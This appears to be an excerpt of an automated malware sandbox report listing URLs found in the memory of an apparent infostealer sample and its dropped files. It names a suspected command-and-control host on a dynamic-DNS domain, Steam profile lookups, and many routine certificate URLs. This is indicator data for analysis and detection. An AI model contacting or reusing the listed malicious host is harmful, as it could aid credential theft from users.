Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe String found in binary or memory: http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arp.119.176.241GD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.DAECIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.FCBFHIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.IDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.JJDAEContent-Disposition:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.org
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.00000000032FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arpdabl.zapto.org/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.orgAEC--
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zapto.orgorm-data;
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zaptoIIDGD
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://arpdabl.zaptoVWXYZ1234567890isposition:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896738110.00000000032AF000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2188073732.00000000358C9000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2193997292.00000000417A2000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2200231222.000000004D676000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2185251178.000000002F952000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1994902601.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1896695804.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/DInvalidGlobalDataContractNamespace
Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr String found in binary or memory: http://schemas.datacontract.org/2004/07/System
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: EHDHIDAEHC.exe, 00000004.00000002.2094707680.0000000003EEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: EHDHIDAEHC.exe, 00000004.00000000.2083490533.0000000000602000.00000002.00000001.01000000.00000009.sdmp, mine[1].exe.0.dr, EHDHIDAEHC.exe.0.dr String found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1784599194.0000000003241000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745266129.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1745302005.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731818479.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1716174518.0000000003235000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771473480.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.2021713393.000000000325C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758386144.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1771428576.000000000323C000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1731884032.000000000323E000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000003.1758422483.000000000323F000.00000004.00000020.00020000.00000000.sdmp, a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174954399.0000000003237000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2344932078.0000000001351000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp, 76561199747278259[1].htm.6.dr, 76561199747278259[1].htm.0.dr String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: a8fb80b6e9d920c26922b29171e8301d5d4d9d4f20cd1b07cad94234b27c61be_payload.exe, 00000000.00000002.2174020167.0000000000408000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000006.00000002.2343148482.0000000000438000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agr
